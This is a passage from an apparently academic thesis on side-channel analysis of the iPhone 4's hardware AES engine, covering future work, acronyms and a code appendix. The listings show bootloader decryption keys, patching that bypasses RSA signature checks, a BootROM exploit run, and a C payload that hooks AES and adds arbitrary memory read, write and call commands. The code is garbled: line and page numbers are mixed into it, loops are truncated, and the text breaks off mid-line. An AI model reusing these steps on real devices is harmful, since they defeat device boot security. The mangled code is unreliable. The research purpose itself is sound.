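The timing figures quoted above follow from simple arithmetic, which the following Python 3 snippet spells out. The function name `engine_timing` is hypothetical, and expressing the remaining latency as a number of clock cycles is an interpretation that the text itself does not make.

```python
def engine_timing(round_ns=5.0, rounds=14, block_ns=95.0):
    """Derive clock speed and latency from the measured durations."""
    clock_mhz = 1000.0 / round_ns        # one round per clock cycle
    rounds_ns = rounds * round_ns        # time spent in the AES rounds
    latency_ns = block_ns - rounds_ns    # remainder of the per-block time
    return {
        "clock_mhz": clock_mhz,
        "rounds_ns": rounds_ns,
        "latency_ns": latency_ns,
        "latency_cycles": latency_ns / round_ns,  # interpretation, see above
    }
```

With the default values this gives a 200 MHz clock, 70 ns for the rounds and 25 ns of remaining latency per block, which is small compared with the roughly 2000 ns seen from the CPU.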

7.2 Future Work

This thesis focused on analysing the cryptographic properties of the Apple iPhone 4 using a public BootROM vulnerability. Future work can follow up and port the research presented here to newer devices, utilizing the checkm8[@ax] exploit by @axi0mX. Interesting targets are the iPhone 5s, which is the first Apple device to use a 64-bit ARM CPU, or the iPhone X, which (at the time of writing) is the latest device with a publicly known BootROM vulnerability. Furthermore, it would be interesting to see whether modern smartphones implement countermeasures like masking or hiding to make side-channel analysis harder and whether it is possible to break these with a setup similar to the one used in this thesis. Also, future work could try to combine this research with boot loader glitching in order to perform side-channel attacks without requiring a software vulnerability.

A Acronyms

AES     Advanced Encryption Standard
CBC     Cipher Block Chaining
CMOS    Complementary Metal-Oxide-Semiconductor
CPA     Correlation Power Analysis
CPU     Central Processing Unit
DFU     Device Firmware Upgrade
DMA     Direct Memory Access
DPA     Differential Power Analysis
DRAM    Dynamic Random Access Memory
EM      Electromagnetic
GID     Group Identifier
GPIO    General Purpose Input/Output
GPU     Graphics Processing Unit
HTTP    Hypertext Transfer Protocol
IC      Integrated Circuit
I/O     Input/Output
IV      Initialization Vector
KEK     Key Encryption Key
KTRR    Kernel Text Readonly Region
MMIO    Memory Mapped Input/Output
NIST    National Institute of Standards and Technology
NVRAM   Non-Volatile Random Access Memory
OOB     Out Of Bounds
PRNG    Pseudorandom Number Generator
RAM     Random Access Memory
ROP     Return Oriented Programming
S-Box   Substitution Box
SDK     Software Development Kit
SIMD    Single Instruction Multiple Data
SNR     Signal-to-Noise Ratio
SoC     System on Chip
SPA     Simple Power Analysis
SRAM    Static Random Access Memory
TCP     Transmission Control Protocol
UART    Universal Asynchronous Receiver Transmitter
UID     User Identifier
USB     Universal Serial Bus
VRAM    Video Random Access Memory

B Code

$ #Step 1: Download firmware file
$ wget http://appldnld.apple.com/iOS7.1/031-4785.20140627.zZ42j/iPhone3,2_7.1.2_11D257_Restore.ipsw 2>/dev/null
$ #Step 2: Extract bootloaders
$ unzip iPhone3,2_7.1.2_11D257_Restore.ipsw Firmware/dfu/iB*
Archive: iPhone3,2_7.1.2_11D257_Restore.ipsw
  inflating: Firmware/dfu/iBEC.n90bap.RELEASE.dfu
  inflating: Firmware/dfu/iBSS.n90bap.RELEASE.dfu
$ #Step 3: Decrypt bootloaders
$ xpwntool Firmware/dfu/iBSS.n90bap.RELEASE.dfu iBSS.dec -iv a5e8a7cd8e659db3b6f983409b98b66c -k 42865aa964f0cba160d173794530e40e46910e14383f3ac9d24cd650ebdb9926
/Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 1593 dc1708931070f981482bff0832f3161aed51ccdd184630c969b15a614482e496bdaf4823a30b7031291da75da1b3
$ xpwntool Firmware/dfu/iBEC.n90bap.RELEASE.dfu iBEC.dec -iv a6ff0ef84ca1c536f540b81c0c858858 -k 45f08035e58d63e6426f1b81fa760e6019b37a42c5286b108b4c37f58e0bc06b
/Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 0 ca08f47d0ec62d03cfdc73bcdfc6f67c07032b9ada3e301c3051a02f4ea6c4edd4a559ff2aac6f0034c625f48a00fd8
$ #Step 4: Patch bootloaders
$ iBoot32Patcher iBSS.dec iBSS.hax
main: Starting...
main: iBoot-1940 inputted.
patch_rsa_check: Entering...
find_bl_verify_shsh_5_6_7: Entering...
find_bl_verify_shsh_5_6_7: Found MOVW instruction at 0x5564
find_bl_verify_shsh_5_6_7: Found BL verify_shsh at 0x5890
find_bl_verify_shsh_5_6_7: Leaving...
patch_rsa_check: Patching BL verify_shsh at 0x5890...
patch_rsa_check: Leaving...
main: Writing out patched file to iBSS.hax...
main: Quitting...
$ iBoot32Patcher iBEC.dec iBEC.hax -c go 0x40000001
main: Starting...
main: iBoot-1940 inputted.
patch_debug_enabled: Entering...
find_dtre_get_value_bl_insn: Entering...
find_dtre_get_value_bl_insn: debug-enabled string is at 0x39322
find_dtre_get_value_bl_insn: "debug-enabled" xref is at 0x1aa20
find_dtre_get_value_bl_insn: Found LDR R0,="debug-enabled" at 0x19cf8
find_dtre_get_value_bl_insn: Found BL instruction at 0x19d10
find_dtre_get_value_bl_insn: Leaving...
patch_debug_enabled: Patching BL insn at 0x19d10...
patch_debug_enabled: Leaving...
patch_cmd_handler: Entering...
patch_cmd_handler: Found the cmd string at 0x32e62
patch_cmd_handler: Found the cmd string reference at 0x3f3e4
patch_cmd_handler: Pointing "go" from 0x5ff01171 to 0x40000001...
patch_cmd_handler: Leaving...
patch_rsa_check: Entering...
find_bl_verify_shsh_5_6_7: Entering...
find_bl_verify_shsh_5_6_7: Found MOVW instruction at 0x18c20
find_bl_verify_shsh_5_6_7: Found BL verify_shsh at 0x191fc
find_bl_verify_shsh_5_6_7: Leaving...
patch_rsa_check: Patching BL verify_shsh at 0x191fc...
patch_rsa_check: Leaving...
main: Writing out patched file to iBEC.hax...
main: Quitting...
$ #Step 5: Re-pack bootloaders
$ xpwntool iBSS.hax iBSS.pwn -t Firmware/dfu/iBSS.n90bap.RELEASE.dfu
/Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 1593 dc1708931070f981482bff0832f3161aed51ccdd184630c969b15a614482e496bdaf4823a30b7031291da75da1b3
/Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 1593 dc1708931070f981482bff0832f3161aed51ccdd184630c969b15a614482e496bdaf4823a30b7031291da75da1b3
$ xpwntool iBEC.hax iBEC.pwn -t Firmware/dfu/iBEC.n90bap.RELEASE.dfu
/Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 0 ca08f47d0ec62d03cfdc73bcdfc6f67c07032b9ada3e301c3051a02f4ea6c4edd4a559ff2aac6f0034c625f48a00fd8
/Users/admin/clones/xpwn/ipsw-patch/img3.c:createAbstractFileFromImg3:643: 0 ca08f47d0ec62d03cfdc73bcdfc6f67c07032b9ada3e301c3051a02f4ea6c4edd4a559ff2aac6f0034c625f48a00fd8
$

Listing B.1: Patching boot loader images

$ #Step 1: Exploit BootROM
$ ./ipwndfu -p
*** based on SHAtter exploit (segment overflow) by posixninja and pod2g ***
Found: CPID:8930 CPRV:20 CPFM:03 SCEP:01 BDID:00 ECID:000002CE800DA34F IBFL:00 SRTG:[iBoot-574.4]
Device is now in pwned DFU Mode.
$ #Step 2: Transfer first stage
$ irecovery -f iBSS.pwn
[======] 100.0%
$ #Step 3: Transfer second stage bootloader
$ irecovery -f iBEC.pwn
[======] 100.0%
$ #Step 4: Transfer payload
$ irecovery -f gido.bin
[======] 100.0%
$ #Step 5: Execute payload
$ irecovery -s
[NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI0:CE0
[NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI0:CE1
[NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI1:CE8
[NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI1:CE9

======
::
:: iBEC for n90ap, Copyright 2013, Apple Inc.
::
:: BUILD_TAG: iBoot-1940.10.58
::
:: BUILD_STYLE: RELEASE
::
:: USB_SERIAL_NUMBER: CPID:8930 CPRV:20 CPFM:03 SCEP:02 BDID:00 ECID:000002CE800DA34F IBFL:1A SRNM:[85135LVZA4S]
::
======

[FTL:MSG] Apple NAND Driver (AND) RO
[NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI0:CE0
[NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI0:CE1
[NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI1:CE8
[NAND] h2fmiPrintConfig:544 Chip ID EC D7 94 7A 54 43 on FMI1:CE9
[FTL:MSG] FIL_Init [OK]
[FTL:MSG] BUF_Init [OK]
[FTL:MSG] FPart Init [OK]
read new style signature 0x43313132 (line:389)
[FTL:MSG] VSVFL Register [OK]
[WMR:MSG] Metadata whitening is set in NAND signature
[FTL:MSG] VFL Init [OK]
[FTL:MSG] VFL_Open [OK]
[FTL:MSG] YAFTL Register [OK]
[FTL:MSG] FTL_Open [OK]
Boot Failure Count:0 Panic Fail Count:0
Entering recovery mode, starting command prompt
> go
Initializing GIDO!
reconfiguring VOL_DOWN button ... ok
precompute TTables ... ok
hook_aes_func
hook_aes_func done!
Done GIDO!
>

Listing B.2: Loading patched boot loader images and payload

import struct
import binascii
import subprocess
import sys

binName = "gido.o"
jtool = subprocess.Popen(["jtool", "-l", binName], stdout=subprocess.PIPE)
regsizes = []
lastregend = 0
for l in jtool.stdout.read().split("\n"):
    if not "Mem" in l or "LC 00" in l or "nl_symbol_ptr" in l:
        continue
    reg = l.split(": ")[1].split("\t")[0]
    start = reg.split("-")
    end = int(start[1], 16)
    start = int(start[0], 16)
    pad = start - lastregend
    lastregend = end
    size = end - start
    section = l.split("\t")[3]
    regsizes.append([pad, size, section])
    # print hex(start),hex(end),hex(size)

# print regsizes
explbin = ""
for reg in regsizes:
    f = open(binName + "." + reg[2], "rb")
    r = f.read()
    f.close()
    explbin += "\x00" * reg[0]
    explbin += r
# print binascii.hexlify(explbin)+"\n\n"
while len(explbin) % 4:
    explbin += "A"

p = open(binName.replace(".o", ".bin"), "wb")
p.write(explbin)
p.close()

print "done building exploit"

Listing B.3: Combining sections to raw executable

//
// main.c
// gido
//

#include
#include


#pragma mark myAES
uint8_t sbox[256] =
{
    0x63,0x7C,0x77,0x7B,0xF2,0x6B,0x6F,0xC5,0x30,0x01,0x67,0x2B,0xFE,0xD7,0xAB,0x76,
    0xCA,0x82,0xC9,0x7D,0xFA,0x59,0x47,0xF0,0xAD,0xD4,0xA2,0xAF,0x9C,0xA4,0x72,0xC0,
    0xB7,0xFD,0x93,0x26,0x36,0x3F,0xF7,0xCC,0x34,0xA5,0xE5,0xF1,0x71,0xD8,0x31,0x15,
    0x04,0xC7,0x23,0xC3,0x18,0x96,0x05,0x9A,0x07,0x12,0x80,0xE2,0xEB,0x27,0xB2,0x75,
    0x09,0x83,0x2C,0x1A,0x1B,0x6E,0x5A,0xA0,0x52,0x3B,0xD6,0xB3,0x29,0xE3,0x2F,0x84,
    0x53,0xD1,0x00,0xED,0x20,0xFC,0xB1,0x5B,0x6A,0xCB,0xBE,0x39,0x4A,0x4C,0x58,0xCF,
    0xD0,0xEF,0xAA,0xFB,0x43,0x4D,0x33,0x85,0x45,0xF9,0x02,0x7F,0x50,0x3C,0x9F,0xA8,
    0x51,0xA3,0x40,0x8F,0x92,0x9D,0x38,0xF5,0xBC,0xB6,0xDA,0x21,0x10,0xFF,0xF3,0xD2,
    0xCD,0x0C,0x13,0xEC,0x5F,0x97,0x44,0x17,0xC4,0xA7,0x7E,0x3D,0x64,0x5D,0x19,0x73,
    0x60,0x81,0x4F,0xDC,0x22,0x2A,0x90,0x88,0x46,0xEE,0xB8,0x14,0xDE,0x5E,0x0B,0xDB,
    0xE0,0x32,0x3A,0x0A,0x49,0x06,0x24,0x5C,0xC2,0xD3,0xAC,0x62,0x91,0x95,0xE4,0x79,
    0xE7,0xC8,0x37,0x6D,0x8D,0xD5,0x4E,0xA9,0x6C,0x56,0xF4,0xEA,0x65,0x7A,0xAE,0x08,
    0xBA,0x78,0x25,0x2E,0x1C,0xA6,0xB4,0xC6,0xE8,0xDD,0x74,0x1F,0x4B,0xBD,0x8B,0x8A,
    0x70,0x3E,0xB5,0x66,0x48,0x03,0xF6,0x0E,0x61,0x35,0x57,0xB9,0x86,0xC1,0x1D,0x9E,
    0xE1,0xF8,0x98,0x11,0x69,0xD9,0x8E,0x94,0x9B,0x1E,0x87,0xE9,0xCE,0x55,0x28,0xDF,
    0x8C,0xA1,0x89,0x0D,0xBF,0xE6,0x42,0x68,0x41,0x99,0x2D,0x0F,0xB0,0x54,0xBB,0x16
};

uint8_t roundkeys[11][16] =
{
    {0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,0x0f},
    {0xd6,0xaa,0x74,0xfd,0xd2,0xaf,0x72,0xfa,0xda,0xa6,0x78,0xf1,0xd6,0xab,0x76,0xfe},
    {0xb6,0x92,0xcf,0x0b,0x64,0x3d,0xbd,0xf1,0xbe,0x9b,0xc5,0x00,0x68,0x30,0xb3,0xfe},
    {0xb6,0xff,0x74,0x4e,0xd2,0xc2,0xc9,0xbf,0x6c,0x59,0x0c,0xbf,0x04,0x69,0xbf,0x41},
    {0x47,0xf7,0xf7,0xbc,0x95,0x35,0x3e,0x03,0xf9,0x6c,0x32,0xbc,0xfd,0x05,0x8d,0xfd},
    {0x3c,0xaa,0xa3,0xe8,0xa9,0x9f,0x9d,0xeb,0x50,0xf3,0xaf,0x57,0xad,0xf6,0x22,0xaa},
    {0x5e,0x39,0x0f,0x7d,0xf7,0xa6,0x92,0x96,0xa7,0x55,0x3d,0xc1,0x0a,0xa3,0x1f,0x6b},
    {0x14,0xf9,0x70,0x1a,0xe3,0x5f,0xe2,0x8c,0x44,0x0a,0xdf,0x4d,0x4e,0xa9,0xc0,0x26},
    {0x47,0x43,0x87,0x35,0xa4,0x1c,0x65,0xb9,0xe0,0x16,0xba,0xf4,0xae,0xbf,0x7a,0xd2},
    {0x54,0x99,0x32,0xd1,0xf0,0x85,0x57,0x68,0x10,0x93,0xed,0x9c,0xbe,0x2c,0x97,0x4e},
    {0x13,0x11,0x1d,0x7f,0xe3,0x94,0x4a,0x17,0xf3,0x07,0xa7,0x8b,0x4d,0x2b,0x30,0xc5}
};

uint8_t fixedKey[32] = {0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,0x0f,
                        0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,0x0f};

void aes_precompute_tables();
void aes_encrypt(uint8_t plaintext[16], uint8_t roundkeys[11][16], uint8_t ciphertext[16]);


uint32_t *T0 = (uint32_t*)(0x41414141);
uint32_t *T1 = (uint32_t*)(0x41414141);
uint32_t *T2 = (uint32_t*)(0x41414141);
uint32_t *T3 = (uint32_t*)(0x41414141);

#pragma mark typedefs

typedef struct CmdArg {
    signed int unk1;
    unsigned int uinteger;
    signed int integer;
    unsigned int type;
    char* string;
} CmdArg;

typedef struct CmdInfo {
    char* name;
    void *handler;
    char* description;
} CmdInfo;

typedef enum {
    kAesEncrypt = 0x10,
    kAesDecrypt = 0x11
} AesOption;

typedef enum {
    kAesType128 = 0x00000000,
    kAesType192 = 0x10000000,
    kAesType256 = 0x20000000
} AesType;

typedef enum {
    kAesSize128 = 0x20,
    kAesSize192 = 0x28,
    kAesSize256 = 0x30
} AesSize;

typedef enum {
    kAesTypeUser = 0x0,
    kAesTypeGid = 0x200,
    kAesTypeUid = 0x201
} AesMode;





#pragma mark ibec funcs

int (*_printf)(const char *,...) = (void*)(0x5ff33ca4+1);
int (*_snprintf)(char *str, size_t size, const char *format,...) = (void*)(0x5ff3425c+1);
void *(*_malloc)(size_t) = (void*)(0x5ff185cc+1);
void (*_free)(void*) = (void*)(0x5ff18680+1);
int (*aes_crypto_cmd)(AesOption option, void* input, void* output, unsigned int size, AesMode mode, void* key, void* iv) = (void*)(0x5ff208ac+1);
int (*uart_getc)(int port, int wait) = (void*)(0x5ff14748+1);
int (*uart_puts)(int port, const char *s) = (void*)(0x5ff1472c+1);


uint32_t (*gpio_read)(uint32_t gpio) = (void*)(0x5ff02768+1);
void (*gpio_write)(uint32_t gpio, uint32_t val) = (void*)(0x5ff02790+1);
void (*gpio_configure)(uint32_t gpio, uint32_t config) = (void*)(0x5ff0280c+1);

void (*watchdog_tickle)(void) = (void*)(0x5ff1f88c+1);

int (*env_set)(const char *name, const char *val, uint32_t zero) = (void*)(0x5ff16ef0+1);
size_t (*env_get_int)(const char *name, size_t fallback) = (void*)(0x5ff16d5c+1);

#pragma mark ibec constants

#define GPIO_POWER 1
#define GPIO_VOL_UP 2
#define GPIO_VOL_DOWN 3

CmdInfo ***ibec_cmd_struct_pointer = (void*)(0x5ff1ed3c);

#pragma mark my functions
int cmd_echo(int argc, CmdArg* argv);
int cmd_md(int argc, CmdArg* argv);
int cmd_mw(int argc, CmdArg* argv);
int aes_cmd(int argc, CmdArg* argv);
int cmd_call(int argc, CmdArg* argv);
int cmd_measure(int argc, CmdArg* argv);
int cmd_decypt(int argc, CmdArg* argv);


unsigned int aes_encrypt_key(char* in, char* out, unsigned int size);
unsigned int aes_decrypt_key(char* in, char* out, unsigned int size);
unsigned int aes_encrypt_key_custom(char* in, char* out, unsigned int size, void *key);
unsigned int aes_decrypt_key_custom(char* in, char* out, unsigned
int size, void *key); 142 void hook_aes_func(); 143 144 145 void DumpHex(const void* data, size_t size); 146 int parseHex(const char *instr, char *ret, size_t *outSize); 147 148 void memset(void *a, unsigned char b, size_t len); 73

void memmove(void *a, void *b, size_t len);
int strcmp(const char *a, const char *b);
int strncmp(const char *a, const char *b, uint32_t n);
int strlen(const char *s);
long atol(const char *s);
void clear_icache();
uint32_t bswap32(uint32_t num);

#pragma mark code
// /* --- this HAS to be TOP function! --- */
int main(int argc, const char * argv[]);
void reposition();
asm(
    "b _reposition\n\t"
    ".skip 0x100\n\t"
);

void reposition(){
    uint8_t *newspace = _malloc(0x6000);
    newspace += 0x1000;
    newspace = (uint8_t*)(((uint32_t)newspace)&~0xfff);
    memmove(newspace,0x40000000,0x6000-0x1000);

    uint8_t *np = main;
    np -= 0x40000000;
    np += (uint32_t)newspace;
    np = (uint8_t*)(((uint32_t)np)|1);

    void (*newmain)() = np;

    clear_icache();
    newmain();
}

int main(int argc, const char * argv[]) {
    CmdInfo **newArgs = NULL;
    _printf("Initializing GIDO!\n");

    CmdInfo *bootx = (void*)0x5ff419c0;
    bootx->name = "echo";
    bootx->handler = cmd_echo;
    bootx->description = "echo something to console";

    CmdInfo *memboot = (void*)0x5ff419d0;
    memboot->name = "aes";
    memboot->handler = aes_cmd;
    memboot->description = "aes talk to aes engin";

    CmdInfo *ticket = (void*)0x5ff4217c;
    ticket->name = "md";
    ticket->handler = cmd_md;
    ticket->description = "dump memory";

    CmdInfo *devicetree = (void*)0x5ff4211c;
    devicetree->name = "decrypt";
    devicetree->handler = cmd_decypt;
    devicetree->description = "decrypt AES hook";

    CmdInfo *setpicture = (void*)0x5ff41a54;
    setpicture->name = "mw";
    setpicture->handler = cmd_mw;
    setpicture->description = "write memory";

    CmdInfo *reboot = (void*)0x5ff419f4;
    reboot->name = "call";
    reboot->handler = cmd_call;
    reboot->description = "call function";

    CmdInfo *go = (void*)0x5ff41a64;
    go->name = "measure";
    go->handler = cmd_measure;
    go->description = "switch to measure mode";

    _printf("reconfiguring VOL_DOWN button ... ");
    gpio_configure(GPIO_VOL_DOWN,1); //set gpio to be output
    gpio_write(GPIO_VOL_DOWN,0);
    _printf("ok\n");

    _printf("precompute TTables ... ");
    aes_precompute_tables();
    _printf("ok\n");

    hook_aes_func();

    _printf("Done GIDO!\n");
    return 0;
}

void aes_function_hook(){ //realAES
    asm(
        //prepare GPIO write
        "movs r4, #0xc\n\t"
        "movt r4, #0xbfa0\n\t"
        "mov r0, #0x92\n\t"
        "mov r1, #0x93\n\t"


        //prepare DMA access
        "movw r5, #0x2000 \t\n" //RX (r1)
        "movt r5, #0x8700 \t\n"

        "ldr r7, [r5]\t\n" //RX_val
        "orr r7, r7, #0x1\t\n" //RX_val
        "str r7, [r5]\t\n" //store RX first!


        "movw r6, #0x1000 \t\n"
        "movt r6, #0x8700 \t\n" //TX (r0)

        "ldr r7, [r6]\t\n" //TX_val
        "orr r7, r7, #0x1\t\n" //TX_val

        //about to enter time critical section!
        "strb r1, [r4]\n\t" //set GPIO high (AES_START)
        //START_CRITICAL_SECTION

        "str r7, [r6]\t\n" //store TX (AES_START)

        "w1:\t\n"
        "ldr r7, [r5]\t\n" //RX_val
        "and r7, r7, #0x30000\t\n" //load RX_val and check for idle
        "cmp r7, #0x10000\t\n"
        "beq w1\t\n"
        //-- END_CRITICAL_SECTION

273 "strb r0, [r4]\n\t" //set GPIO low 274 ); 275 } 276 277 278 void hook_aes_func(){ 279 _printf("hook_aes_func\n"); 280 char trampolin[] = "\xDF\xF8\x02\x00\x01\xE0\x44\x43\x42\x41\x80\x47"; 281 void **dstVal =(void **)&trampolin[6]; 282 *dstVal = aes_function_hook; 283 284 uint16_t *startHook =(void*)0x5ff02138; 285 uint16_t *endHook =(void*)0x5ff0215a; //not inclusive 286 287 for (int i=0; i= 2) { 304 for(i =1;i < argc; i++) { 305 _printf("%s ", argv[i].string); 306 } 307 _printf("\n"); 308 return 0; 309 } 310 _printf("usage: echo \n"); 311 return 0; 312 } 313 314 int cmd_decypt(int argc, CmdArg* argv){ 315 size_t payloadSize = env_get_int("filesize",0); 316 char *inBuf =0x40000000; 317 318 char outBuf[0x300]; 319 char printBuf[0x600]; 320 aes_decrypt_key(inBuf, outBuf, payloadSize); 321 322 for (int i =0;i < payloadSize; i++) { 323 unsigned char c =(unsigned char)outBuf[i]; 324 if((printBuf[2*i +0]=c >> 4) < 10){ 325 printBuf[2*i +0]+=’0’; 326 }else{ 327 printBuf[2*i +0]+=’a’ -10; 328 } 329 if((printBuf[2*i +1]=c &0xf)<10){ 330 printBuf[2*i +1]+=’0’; 331 }else{ 332 printBuf[2*i +1]+=’a’ -10; 333 } 334 printBuf[2*i +2]=0; 76 BCode

335 } 336 env_set("cmd-results",printBuf,0); 337 watchdog_tickle(); 338 return 0; 339 } 340 341 int cmd_call(int argc, CmdArg* argv){ 342 int i =0; 343 uint32_t args[4] = {0,0,0,0}; 344 uint32_t func =0; 345 if(argc >= 2) { 346 size_t rt =0; 347 parseHex(argv[1].string,&func,&rt); 348 func = bswap32(func); 349 if (rt >4){ 350 _printf("error funcpointer too large\n"); 351 return 0; 352 } 353 for (size_t i =2;i-2 < 4 && i < argc; i++) { 354 size_t rt =0; 355 parseHex(argv[i].string,&args[i-2], &rt); 356 args[i-2] = bswap32(args[i-2]); 357 } 358 _printf("calling (0x%08x)(0x%08x,0x%08x,0x%08x,0x%08x) ",func,args[0],args[1],args[2],args [3]); 359 360 uint32_t retval =((uint32_t (*) (uint32_t,uint32_t,uint32_t,uint32_t))func)(args[0],args [1],args[2],args[3]); 361 _printf("reval=0x%08x (%lu)\n",retval,retval); 362 return 0; 363 } 364 _printf("usage: call \n"); 365 return 0; 366 } 367 368 int cmd_measure(int argc, CmdArg* argv){ 369 uart_puts(0,"enter measure mode\n"); 370 char buf[0x200]; 371 char printBuf[100]; 372 int keepRunning =1; 373 374 _printf("disable Idle poweroff ..."); 375 *(uint16_t*)0x5ff00f68 =0x4770; 376 clear_icache(); 377 _printf("ok\n"); 378 379 //patch task_yield to return 0; 380 *((uint16_t*)0x5ff1f008)=0x4770; 381 clear_icache(); 382 383 while (gpio_read(GPIO_VOL_UP)&&keepRunning){ 384 memset(buf,0,sizeof(buf)); 385 for (size_t i =0;i < sizeof(buf)&&gpio_read(GPIO_VOL_UP); i++) { 386 while ((buf[i]=uart_getc(0,0)) == -1 && gpio_read(GPIO_VOL_UP)); 387 if (i >4&&!strncmp(buf+i-3,"END",3)) { 388 uart_puts(0,"[M] found END tag!\n"); 389 buf[i]=’\0’;//zero terminate buf 390 391 if (strncmp(buf, "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE", sizeof(" EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE")-1) == 0) { 392 keepRunning =0; 393 break; 77

394 } 395 396 if (i>10&&!strncmp(buf,"BEGIN",5)) { 397 uart_puts(0,"[M] valid command detected\n"); 398 size_t rt =0; 399 int seedsLen =0; 400 uint8_t seeds[3][16]; 401 unsigned long encCount =0; 402 unsigned long mode =0; 403 uint8_t cipherEnc[16]; 404 uint8_t aesIn[48]; 405 uint8_t aesOut[48]; 406 //expecting command like: "BEGIN " 407 408 //zero terminate after seeds 409 char *encStr =&buf[5/*BEGIN*/]; 410 while (*++encStr != ’ ’){ 411 if (*encStr == 0){ 412 uart_puts(0,"[M] failed parsing encStr!\n"); 413 break; 414 } 415 } 416 *encStr = ’\0’; 417 if (parseHex(&buf[5],&seeds,&rt)||(rt != 16 && rt != 32 && rt != 48)){ 418 uart_puts(0,"[M] failed parsing seeds failed!\n"); 419 break; 420 } 421 seedsLen = rt; 422 423 if (!(encCount = atol(&buf[5/*BEGIN*/+2*seedsLen/**/+1/*space*/]))){ 424 uart_puts(0,"[M] failed parsing encCount!\n"); 425 break; 426 } 427 428 char *modeStr =&buf[5/*BEGIN*/+2*seedsLen/**/+1/*space*/]; 429 while (*++modeStr != ’ ’){ 430 if (*modeStr == 0){ 431 uart_puts(0,"[M] failed parsing modeStr!\n"); 432 break; 433 } 434 } 435 436 if (!(mode = atol(modeStr))){ 437 uart_puts(0,"[M] failed parsing mode!\n"); 438 break; 439 } 440 441 if (mode == 1) { //MODE: staticVSrandom 442 if (seedsLen != 32){ 443 uart_puts(0,"[M] invalid seedsLen="); 444 _snprintf(printBuf, sizeof(printBuf), "%d", seedsLen); 445 uart_puts(0,printBuf); 446 uart_puts(0," but expected 32\n"); 447 break; 448 } 449 uint8_t cipherSel[16]; 450 uart_puts(0,"[M] seed encrypt="); 451 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[0][0],seeds[0][1],seeds[0][2],seeds[0][3],seeds[0][4], seeds[0][5],seeds[0][6],seeds[0][7],seeds[0][8],seeds[0][9],seeds[0][10],seeds [0][11],seeds[0][12],seeds[0][13],seeds[0][14],seeds[0][15]); 452 uart_puts(0,printBuf); 78 BCode

453 uart_puts(0,"\n[M] seed select="); 454 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[1][0],seeds[1][1],seeds[1][2],seeds[1][3],seeds[1][4], seeds[1][5],seeds[1][6],seeds[1][7],seeds[1][8],seeds[1][9],seeds[1][10],seeds [1][11],seeds[1][12],seeds[1][13],seeds[1][14],seeds[1][15]); 455 uart_puts(0,printBuf); 456 uart_puts(0,"\n[M] encCount="); 457 _snprintf(printBuf, sizeof(printBuf), "%lu\n",encCount); 458 uart_puts(0,printBuf); 459 460 uint8_t aesIn[128]; 461 uint8_t aesOut[128]; 462 463 for (long z =0;z < encCount; z++) { 464 aes_encrypt(seeds[1],roundkeys,cipherSel); 465 466 for (int mult =0;mult

503 uart_puts(0,printBuf); 504 uart_puts(0,"\n[M] user key="); 505 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[1][0],seeds[1][1],seeds[1][2],seeds[1][3],seeds[1][4], seeds[1][5],seeds[1][6],seeds[1][7],seeds[1][8],seeds[1][9],seeds[1][10],seeds [1][11],seeds[1][12],seeds[1][13],seeds[1][14],seeds[1][15]); 506 uart_puts(0,printBuf); 507 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[2][0],seeds[2][1],seeds[2][2],seeds[2][3],seeds[2][4], seeds[2][5],seeds[2][6],seeds[2][7],seeds[2][8],seeds[2][9],seeds[2][10],seeds [2][11],seeds[2][12],seeds[2][13],seeds[2][14],seeds[2][15]); 508 uart_puts(0,printBuf); 509 uart_puts(0,"\n[M] encCount="); 510 _snprintf(printBuf, sizeof(printBuf), "%lu\n",encCount); 511 uart_puts(0,printBuf); 512 513 for (long z =0;z < encCount; z++) { 514 aes_encrypt(seeds[0],roundkeys,cipherEnc); 515 aes_encrypt_key_custom(cipherEnc,(char*)aesOut, 16, seeds[1]); 516 memmove(seeds[0], cipherEnc, 16); 517 ((uint64_t *)cipherMesh)[0] ^= ((uint64_t *)aesOut)[0]; 518 ((uint64_t *)cipherMesh)[1] ^= ((uint64_t *)aesOut)[1]; 519 watchdog_tickle(); 520 } 521 522 gpio_write(GPIO_VOL_DOWN,1); 523 gpio_write(GPIO_VOL_DOWN,0); 524 525 uart_puts(0,"[M] final encrypt="); 526 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x %02x%02x%02x%02x",seeds[0][0],seeds[0][1],seeds[0][2],seeds[0][3],seeds[0][4], seeds[0][5],seeds[0][6],seeds[0][7],seeds[0][8],seeds[0][9],seeds[0][10],seeds [0][11],seeds[0][12],seeds[0][13],seeds[0][14],seeds[0][15]); 527 uart_puts(0,printBuf); 528 uart_puts(0,"\n[M] final ciphermesh="); 529 memmove(seeds[1], cipherMesh, 16); 530 _snprintf(printBuf, sizeof(printBuf), "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x 